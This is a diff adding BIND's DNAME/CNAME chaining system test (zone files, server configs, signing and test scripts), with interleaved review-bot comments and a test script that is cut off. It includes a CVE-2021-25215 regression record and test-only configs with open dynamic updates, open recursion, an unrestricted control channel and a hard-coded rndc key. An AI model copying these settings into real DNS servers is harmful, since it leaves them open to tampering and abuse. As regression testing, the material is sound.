@@ -0,0 +1,69 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +a.short A 10.0.0.1 +short-dname DNAME short +a.longlonglonglonglonglonglonglonglonglonglonglonglong A 10.0.0.2 +long-dname DNAME longlonglonglonglonglonglonglonglonglonglonglonglong +toolong-dname DNAME longlonglonglonglonglonglonglonglonglonglonglonglong +cname CNAME a.cnamedname +cnamedname DNAME target +a.target A 10.0.0.3 + +; CNAME to delegation +; (unsigned delegations, external and internal) +sub5 NS ns5.sub5 +ns5.sub5 A 10.53.0.5 +a CNAME a.sub5 +sub2 NS ns2.sub2 +ns2.sub2 A 10.53.0.2 +b CNAME b.sub2 + +; (signed delegation, external and internal) +; note: these DS records are fake and will not validate; we're only +; testing that the resolver handles their presence in a reply correctly +signed-sub5 NS ns5.sub5 +signed-sub5 DS 44137 8 2 1CB4F54E0B4F4F85109143113A3C679716A2377D86EB0907846A03FB 0C0A3927 +c CNAME c.signed-sub5 +signed-sub2 NS ns2.sub2 +signed-sub2 DS 44137 8 2 1CB4F54E0B4F4F85109143113A3C679716A2377D86EB0907846A03FB 0C0A3927 +d CNAME d.signed-sub2 + +; long CNAME loop +loop CNAME goop +goop CNAME boop +boop CNAME soup +soup CNAME gump +gump CNAME bump +bump CNAME lump +lump CNAME rump +rump CNAME romp +romp CNAME bomp +bomp CNAME stomp +stomp CNAME clomp +clomp CNAME clump +clump CNAME hunk +hunk CNAME hank +hank CNAME bank +bank CNAME wank +wank CNAME woop +woop CNAME loop 
diff --git a/bin/tests/system/chain/ns2/generic.db b/bin/tests/system/chain/ns2/generic.db
new file mode 100644
index 0000000..9d59378
--- /dev/null
+++ b/bin/tests/system/chain/ns2/generic.db
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 86400 SOA ns2.domain0.nil. hostmaster.ns2.nil. 0 1 1 1 1
+@ 86400 NS ns2.domain0.nil.
+ns2 86400 A 10.53.0.2
+ns2 86400 AAAA fd92:7065:b8e:ffff::2
+
+@ 86400 A 1.2.3.4
+@ 86400 AAAA 1:2:3::4
+* 86400 A 1.2.3.4
+* 86400 AAAA 1:2:3::4
+; CVE-2021-25215 regression test data
+self 86400 DNAME nil.
diff --git a/bin/tests/system/chain/ns2/named.conf.in b/bin/tests/system/chain/ns2/named.conf.in
new file mode 100644
index 0000000..922d2fa
--- /dev/null
+++ b/bin/tests/system/chain/ns2/named.conf.in
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ notify yes;
+};
+
+zone "example" {
+ type primary;
+ file "example.db.signed";
+ allow-update { any; };
+};
+
+zone "sub2.example" {
+ type primary;
+ file "sub.db";
+};
+
+zone "signed-sub2.example" {
+ type primary;
+ file "sub.db";
+};
+
+zone "wildcard-secure.example" {
+ type primary;
+ file "wildcard-secure.example.db.signed";
+};
+
+zone "wildcard-nsec.example" {
+ type primary;
+ file "wildcard-nsec.example.db.signed";
+};
+
+zone "wildcard-nsec3.example" {
+ type primary;
+ file "wildcard-nsec3.example.db.signed";
+};
+
+zone "wildcard-nsec3-optout.example" {
+ type primary;
+ file "wildcard-nsec3-optout.example.db.signed";
+};
+
+zone "domain0.nil" { type primary; file "generic.db"; };
+zone "domain1.nil" { type primary; file "generic.db"; };
+zone "domain2.nil" { type primary; file "generic.db"; };
+zone "domain3.nil" { type primary; file "generic.db"; };
+zone "domain4.nil" { type primary; file "generic.db"; };
+zone "domain5.nil" { type primary; file "generic.db"; };
+zone "domain6.nil" { type primary; file "generic.db"; };
+zone "domain7.nil" { type primary; file "generic.db"; };
+zone "domain8.nil" { type primary; file "generic.db"; };
+zone "domain9.nil" { type primary; file "generic.db"; };
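Review bot: `allow-update { any; };` on zone "example" accepts unauthenticated dynamic updates, and nothing in the file says this is deliberate. The only bound visible here is `listen-on { 10.53.0.2; }`, presumably a test-only address, so a one-line comment above the statement, e.g. `// test fixture: open dynamic updates are intentional, do not reuse outside the system tests`, would keep the stanza from being copied into a real configuration. The same applies to ns7/named.conf.in later in this commit, where `allow-recursion { any; }`, the `controls` statement with `allow { any; }` and the fixed `rndc_key` secret are likewise settings that only make sense inside the test network.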
diff --git a/bin/tests/system/chain/ns2/sign.sh b/bin/tests/system/chain/ns2/sign.sh
new file mode 100644
index 0000000..c067807
--- /dev/null
+++ b/bin/tests/system/chain/ns2/sign.sh
@@ -0,0 +1,55 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=example.
+zonefile=example.db
+signedfile=example.db.signed
+
+ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} -fk $zone)
+zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} $zone)
+$SIGNER -S -o $zone -f $signedfile $zonefile > /dev/null
+
+zone=wildcard-secure.example.
+zonefile=wildcard-secure.db
+signedfile=wildcard-secure.example.db.signed
+
+ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} -fk $zone)
+zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} $zone)
+$SIGNER -S -o $zone -f $signedfile $zonefile > /dev/null
+
+zone=wildcard-nsec.example.
+zonefile=wildcard.db
+signedfile=wildcard-nsec.example.db.signed
+
+ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} -fk $zone)
+zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} $zone)
+$SIGNER -S -o $zone -f $signedfile $zonefile > /dev/null
+
+zone=wildcard-nsec3.example.
+zonefile=wildcard.db
+signedfile=wildcard-nsec3.example.db.signed
+
+ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} -fk $zone)
+zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} $zone)
+$SIGNER -S -3 - -H 0 -o $zone -f $signedfile $zonefile > /dev/null
+
+zone=wildcard-nsec3-optout.example.
+zonefile=wildcard.db
+signedfile=wildcard-nsec3-optout.example.db.signed
+
+ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} -fk $zone)
+zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} $zone)
+$SIGNER -S -3 - -H 0 -A -o $zone -f $signedfile $zonefile > /dev/null
diff --git a/bin/tests/system/chain/ns2/sub.db b/bin/tests/system/chain/ns2/sub.db
new file mode 100644
index 0000000..ad03165
--- /dev/null
+++ b/bin/tests/system/chain/ns2/sub.db
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2017031001 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
+d A 10.0.0.4
diff --git a/bin/tests/system/chain/ns2/wildcard-secure.db b/bin/tests/system/chain/ns2/wildcard-secure.db
new file mode 100644
index 0000000..e39237a
--- /dev/null
+++ b/bin/tests/system/chain/ns2/wildcard-secure.db
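Review bot: The `-e` in the `#!/bin/sh -e` interpreter line has no effect when the script is started the way setup.sh in this commit starts it (`$SHELL sign.sh`), because the shebang is ignored when the file is passed as an argument to the shell. Unless conf.sh turns it on (not visible here), a failing `$KEYGEN` or any `$SIGNER` call but the last goes unnoticed and the zones are served with whatever was left on disk; adding `set -e` on the line after `. $SYSTEMTESTTOP/conf.sh` makes the intent hold for both invocation styles. The `ksk=` and `zsk=` values are never read in this script, so a short comment that they exist only to swallow keygen's output would help the next reader.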
@@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2021051901 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS localhost. + +delegation NS localhost. + DS 12345 13 2 0000000000000000000000000000000000000000000000000000000000000000 + +; CNAME pointing into a child zone +cname CNAME delegation + +; wildcard CNAME pointing at a CNAME pointing into a child zone +* CNAME cname diff --git a/bin/tests/system/chain/ns2/wildcard.db b/bin/tests/system/chain/ns2/wildcard.db new file mode 100644 index 0000000..cc39e9c --- /dev/null +++ b/bin/tests/system/chain/ns2/wildcard.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2021051901 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS localhost. + +delegation NS localhost. + +; CNAME pointing into a child zone +cname CNAME delegation + +; wildcard CNAME pointing at a CNAME pointing into a child zone +* CNAME cname 
diff --git a/bin/tests/system/chain/ns5/named.conf.in b/bin/tests/system/chain/ns5/named.conf.in
new file mode 100644
index 0000000..86bbf26
--- /dev/null
+++ b/bin/tests/system/chain/ns5/named.conf.in
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ notify yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "sub5.example" {
+ type primary;
+ file "sub.db";
+};
+
+zone "signed-sub5.example" {
+ type primary;
+ file "sub.db";
+};
diff --git a/bin/tests/system/chain/ns5/sub.db b/bin/tests/system/chain/ns5/sub.db
new file mode 100644
index 0000000..df571fb
--- /dev/null
+++ b/bin/tests/system/chain/ns5/sub.db
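Review bot: The header comment `// NS2` is wrong for this file: every address in the options block is 10.53.0.5 and the zones served are sub5.example and signed-sub5.example, so it should read `// NS5`. It looks carried over from ns2/named.conf.in, and a mislabelled server makes the test topology harder to follow when reading logs against configs.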
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2017031001 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns5
+ns5 A 10.53.0.5
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
+d A 10.0.0.4
diff --git a/bin/tests/system/chain/ns7/named.conf.in b/bin/tests/system/chain/ns7/named.conf.in
new file mode 100644
index 0000000..31ca3ef
--- /dev/null
+++ b/bin/tests/system/chain/ns7/named.conf.in
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ directory ".";
+ query-source address 10.53.0.7;
+ notify-source 10.53.0.7;
+ transfer-source 10.53.0.7;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.7; };
+ listen-on-v6 { fd92:7065:b8e:ffff::7; };
+ recursion yes;
+ allow-recursion { any; };
+ dnssec-validation yes;
+ deny-answer-aliases {
+ "example";
+ } except-from {
+ "example";
+ };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
diff --git a/bin/tests/system/chain/ns7/root.hint b/bin/tests/system/chain/ns7/root.hint
new file mode 100644
index 0000000..4f3f48b
--- /dev/null
+++ b/bin/tests/system/chain/ns7/root.hint
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS a.root-servers.nil.
+a.root-servers.nil. IN A 10.53.0.1
diff --git a/bin/tests/system/chain/prereq.sh b/bin/tests/system/chain/prereq.sh
new file mode 100644
index 0000000..b074318
--- /dev/null
+++ b/bin/tests/system/chain/prereq.sh
@@ -0,0 +1,50 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if test -n "$PYTHON"
+then
+ if $PYTHON -c "import dns" 2> /dev/null
+ then
+ :
+ else
+ echo_i "This test requires the dnspython module." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires Python and the dnspython module." >&2
+ exit 1
+fi
+
+if $PERL -e 'use Net::DNS;' 2>/dev/null
+then
+ if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION >= 0.69 && $Net::DNS::VERSION <= 0.74);' 2>/dev/null
+ then
+ :
+ else
+ echo_i "Net::DNS versions 0.69 to 0.74 have bugs that cause this test to fail: please update." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires the perl Net::DNS library." >&2
+ exit 1
+fi
+if $PERL -e 'use Net::DNS::Nameserver;' 2>/dev/null
+then
+ :
+else
+ echo_i "This test requires the Net::DNS::Nameserver library." >&2
+ exit 1
+fi
diff --git a/bin/tests/system/chain/setup.sh b/bin/tests/system/chain/setup.sh
new file mode 100644
index 0000000..a2c47ae
--- /dev/null
+++ b/bin/tests/system/chain/setup.sh
@@ -0,0 +1,23 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
+
+cd ns2
+$SHELL sign.sh
diff --git a/bin/tests/system/chain/tests.sh b/bin/tests/system/chain/tests.sh
new file mode 100644
index 0000000..19cdb68
--- /dev/null
+++ b/bin/tests/system/chain/tests.sh
@@ -0,0 +1,625 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+DIGOPTS="-p ${PORT}"
+RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s"
+SEND="$PERL $SYSTEMTESTTOP/send.pl 10.53.0.4 ${EXTRAPORT1}"
+status=0
+n=0
+
+n=`expr $n + 1`
+echo_i "checking short DNAME from authoritative ($n)"
+ret=0
+$DIG $DIGOPTS a.short-dname.example @10.53.0.2 a > dig.out.ns2.short || ret=1
+grep "status: NOERROR" dig.out.ns2.short > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking short DNAME from recursive ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS a.short-dname.example @10.53.0.7 a > dig.out.ns4.short || ret=1
+grep "status: NOERROR" dig.out.ns4.short > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking long DNAME from authoritative ($n)"
+ret=0
+$DIG $DIGOPTS a.long-dname.example @10.53.0.2 a > dig.out.ns2.long || ret=1
+grep "status: NOERROR" dig.out.ns2.long > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking long DNAME from recursive ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS a.long-dname.example @10.53.0.7 a > dig.out.ns4.long || ret=1
+grep "status: NOERROR" dig.out.ns4.long > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking (too) long DNAME from authoritative ($n)"
+ret=0
+$DIG $DIGOPTS 01234567890123456789012345678901234567890123456789.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.long-dname.example @10.53.0.2 a > dig.out.ns2.toolong || ret=1
+grep "status: YXDOMAIN" dig.out.ns2.toolong > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking (too) long DNAME from recursive with cached DNAME ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS 01234567890123456789012345678901234567890123456789.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.long-dname.example @10.53.0.7 a > dig.out.ns4.cachedtoolong || ret=1
+grep "status: YXDOMAIN" dig.out.ns4.cachedtoolong > /dev/null || ret=1
+grep '^long-dname\.example\..*DNAME.*long' dig.out.ns4.cachedtoolong > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking (too) long DNAME from recursive without cached DNAME ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS 01234567890123456789012345678901234567890123456789.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.longlonglonglonglonglonglonglonglonglonglonglonglonglong.toolong-dname.example @10.53.0.7 a > dig.out.ns4.uncachedtoolong || ret=1
+grep "status: YXDOMAIN" dig.out.ns4.uncachedtoolong > /dev/null || ret=1
+grep '^toolong-dname\.example\..*DNAME.*long' dig.out.ns4.uncachedtoolong > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+find_records() {
+ owner_name="$1"
+ rr_type="$2"
+ file="$3"
+ awk '$1 == "'"$owner_name"'" && $4 == "'"$rr_type"'" { print }' < "$file"
+}
+
+count_records() {
+ owner_name="$1"
+ rr_type="$2"
+ file="$3"
+ find_records "$owner_name" "$rr_type" "$file" | wc -l
+}
+
+exactly_one_record_exists_for() {
+ owner_name="$1"
+ rr_type="$2"
+ file="$3"
+ test "$(count_records "$owner_name" "$rr_type" "$file")" -eq 1
+}
+
+no_records_exist_for() {
+ owner_name="$1"
+ rr_type="$2"
+ file="$3"
+ test "$(count_records "$owner_name" "$rr_type" "$file")" -eq 0
+}
+
+ensure_no_ds_in_bitmap() {
+ owner_name="$1"
+ rr_type="$2"
+ file="$3"
+ case "$rr_type" in
+ NSEC) start_index=6 ;;
+ NSEC3) start_index=10 ;;
+ *) exit 1 ;;
+ esac
+ find_records "$owner_name" "$rr_type" "$file" | awk '{ for (i='"$start_index"'; i<=NF; i++) if ($i == "DS") exit 1 }'
+}
+
+n=`expr $n + 1`
+echo_i "checking secure delegation prepared using CNAME chaining ($n)"
+ret=0
+# QNAME exists, so the AUTHORITY section should only contain an NS RRset and a
+# DS RRset.
+$DIG $DIGOPTS @10.53.0.2 cname.wildcard-secure.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1
+# Ensure that the AUTHORITY section contains the expected NS and DS RRsets.
+exactly_one_record_exists_for "delegation.wildcard-secure.example." NS dig.out.2.$n || ret=1
+exactly_one_record_exists_for "delegation.wildcard-secure.example." DS dig.out.2.$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking secure delegation prepared using wildcard expansion + CNAME chaining ($n)"
+ret=0
+# QNAME does not exist, so the AUTHORITY section should contain an NS RRset, an
+# NSEC record proving nonexistence of QNAME, and a DS RRset at the zone cut.
+$DIG $DIGOPTS @10.53.0.2 a-nonexistent-name.wildcard-secure.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1
+# Ensure that the AUTHORITY section contains the expected NS and DS RRsets.
+exactly_one_record_exists_for "delegation.wildcard-secure.example." NS dig.out.2.$n || ret=1
+exactly_one_record_exists_for "delegation.wildcard-secure.example." DS dig.out.2.$n || ret=1
+# Check NSEC records in the AUTHORITY section.
+no_records_exist_for "wildcard-secure.example." NSEC dig.out.2.$n || ret=1
+exactly_one_record_exists_for "*.wildcard-secure.example." NSEC dig.out.2.$n || ret=1
+no_records_exist_for "cname.wildcard-secure.example." NSEC dig.out.2.$n || ret=1
+no_records_exist_for "delegation.wildcard-secure.example." NSEC dig.out.2.$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking insecure delegation prepared using CNAME chaining, NSEC ($n)"
+ret=0
+# QNAME exists, so the AUTHORITY section should only contain an NS RRset and a
+# single NSEC record proving nonexistence of a DS RRset at the zone cut.
+$DIG $DIGOPTS @10.53.0.2 cname.wildcard-nsec.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1
+# Ensure that the AUTHORITY section contains an NS RRset without an associated
+# DS RRset.
+exactly_one_record_exists_for "delegation.wildcard-nsec.example." NS dig.out.2.$n || ret=1
+no_records_exist_for "delegation.wildcard-nsec.example." DS dig.out.2.$n || ret=1
+# Check NSEC records in the AUTHORITY section.
+no_records_exist_for "wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+no_records_exist_for "*.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+no_records_exist_for "cname.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+exactly_one_record_exists_for "delegation.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+# Ensure the NSEC record for the zone cut does not have the DS bit set in the
+# type bit map.
+ensure_no_ds_in_bitmap "delegation.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking insecure delegation prepared using wildcard expansion + CNAME chaining, NSEC, QNAME #1 ($n)"
+ret=0
+# QNAME does not exist, so the AUTHORITY section should contain an NS RRset and
+# NSEC records proving nonexistence of both QNAME and a DS RRset at the zone
+# cut. In this test case, these two NSEC records are different.
+$DIG $DIGOPTS @10.53.0.2 a-nonexistent-name.wildcard-nsec.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1
+# Ensure that the AUTHORITY section contains an NS RRset without an associated
+# DS RRset.
+exactly_one_record_exists_for "delegation.wildcard-nsec.example." NS dig.out.2.$n || ret=1
+no_records_exist_for "delegation.wildcard-nsec.example." DS dig.out.2.$n || ret=1
+# Check NSEC records in the AUTHORITY section.
+no_records_exist_for "wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+exactly_one_record_exists_for "*.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+no_records_exist_for "cname.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+exactly_one_record_exists_for "delegation.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+# Ensure the NSEC record for the zone cut does not have the DS bit set in the
+# type bit map.
+ensure_no_ds_in_bitmap "delegation.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking insecure delegation prepared using wildcard expansion + CNAME chaining, NSEC, QNAME #2 ($n)"
+ret=0
+# QNAME does not exist, so the AUTHORITY section should contain an NS RRset and
+# NSEC records proving nonexistence of both QNAME and a DS RRset at the zone
+# cut. In this test case, the same NSEC record proves nonexistence of both the
+# QNAME and the DS RRset at the zone cut.
+$DIG $DIGOPTS @10.53.0.2 z-nonexistent-name.wildcard-nsec.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1
+# Ensure that the AUTHORITY section contains an NS RRset without an associated
+# DS RRset.
+exactly_one_record_exists_for "delegation.wildcard-nsec.example." NS dig.out.2.$n || ret=1
+no_records_exist_for "delegation.wildcard-nsec.example." DS dig.out.2.$n || ret=1
+# Check NSEC records in the AUTHORITY section.
+no_records_exist_for "wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+no_records_exist_for "*.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+no_records_exist_for "cname.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
